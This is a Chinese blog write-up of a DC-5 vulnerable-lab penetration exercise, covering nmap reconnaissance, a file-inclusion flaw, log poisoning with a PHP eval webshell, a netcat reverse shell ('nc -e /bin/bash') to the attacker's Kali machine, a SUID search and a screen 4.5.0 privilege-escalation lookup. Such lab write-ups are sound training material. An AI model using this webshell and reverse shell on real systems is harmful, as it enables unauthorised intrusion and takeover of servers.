DC-5靶场实战模拟

最新推荐文章于 2024-09-12 21:35:32 发布
最新推荐文章于 2024-09-12 21:35:32 发布
阅读量167 收藏 1
点赞数 2
文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71332744/article/details/140950694
版权

信息收集

端口和网段信息:使用nmap扫描
//扫描网段中存货的主机
nmap -sP 192.168.10.0/24
//进行对主机进行猜测-》发现接口:80存活
nmap -sV 192.168.10.245
目录信息 :使用dirbuster
指纹信息

 

找漏洞

发现web 中contact有提交界面进行尝试

 发现页脚时间随着刷新变化,可能有文件包含漏洞

 

 猜测传参的key为’file‘

注入一句话木马:

<?php eval($_POST['pass']);?>

 使用工具进行连接

http://192.168.10.145/thankyou.php?file=/var/log/nginx/error.log
/var/log/nginx/error.log 为nginx报错日志路径

使用nc连接kali

kali中运行,持续监听1234端口
nc -lvvp 1234

在连接靶机的工具中使用,连接kali
nc -e /bin/bash 192.168.10.223 1234

查找dc-5中的特殊文件

find / -perm -u=s -type f 2>/dev/null

查找对应插件payload进行提权 

searchsploit scree 4.5.0

 

 

 

王同学_116
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-5靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-30 2842
dc-5靶场详细渗透过程
利用kali对DC-9靶场进行渗透测试
m0_70489261的博客
03-03 546
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。
DC-6靶机测试渗透详细教程
wwxxss
10-26 1314
DC-6的靶场详细渗透过程
红日靶场-ATT&CK实战系列-红队评估(一)
m0_66638011的博客
06-21 1040
红日靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。红日靶机主要以内网渗透学习为主。红日靶场网络结构复杂多样,包括外网、内网、DMZ区域等。不同的网络区域之间通过防火墙、路由器等设备进行隔离和访问控制。靶场网络结构中还包括了各种服务器和网络设备,如Web服务器、数据库服务器、文件服务器等。
完全模拟ATT&CK实战靶场之六
tangshuangsss的专栏
04-26 1497
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本...
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 908
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
vulnhub DC-1
小白一枚多多关注的博客
01-30 311
vulnhub DC-1(两种不同的攻击手法)
Vulnstack---ATT&CK实战系列:--红队实战(一)
最新发布
weixin_53736204的博客
09-12 266
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1677
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
ATT&CK实战系列——红队实战(五)
lza20001103的博客
10-17 2571
ATT&CK实战系列——红队实战(五) 文章目录ATT&CK实战系列——红队实战(五)前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记 前言 前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。 靶场搭建 靶场下载
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 1737
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关
红日靶场1(渗透记录)
b1n的博客
09-12 1386
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
掌握 Linux 命令的艺术:深入解析与实用指南
hacker__的博客
09-06 1414
Linux操作系统是和windows操作系统是并列的关系。只不过只是两个操作系统的特性各有不同而已。
Linux 进程控制
2302_77289177的博客
09-08 1156
Linux 进程控制
高效诊断Linux性能问题
Tiger93的博客
09-08 463
诊断Linux性能问题
Linux> 基础IO
prodigy623的博客
09-06 1019
详解Linux基础IO:文件系统调用接口与C库文件函数的关系、重定向、数据缓冲区、文件系统、动静态库
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值